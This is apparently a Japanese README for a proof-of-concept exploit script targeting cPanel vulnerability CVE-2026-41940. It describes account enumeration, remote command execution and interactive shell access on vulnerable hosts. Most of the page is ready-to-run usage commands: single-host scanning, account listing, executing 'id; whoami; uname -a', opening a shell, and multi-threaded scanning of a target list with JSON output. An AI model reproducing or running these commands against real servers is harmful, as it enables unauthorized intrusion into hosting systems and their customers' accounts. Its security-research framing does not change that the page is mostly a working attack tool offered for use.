
cPanel を標的とした CVE-2026-41940 の概念実証エクスプロイト。脆弱なホスト上でアカウント列挙、コマンド実行、対話型シェルアクセスを可能にします。
python3 poc_CVE-2026-41940.py -h
1台のホストをスキャン
python3 poc_CVE-2026-41940.py -u https://target.example:2086
チェーン成功後にアカウントを一覧表示
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action list
シェルコマンドを実行
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action cmd --cmd 'id; whoami; uname -a'
対話型シェル
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action shell
ファイルからターゲットを読み込み + JSONレポート出力
python3 poc_CVE-2026-41940.py -l targets.txt -t 20 -o results.json
参照 : ynsmroztas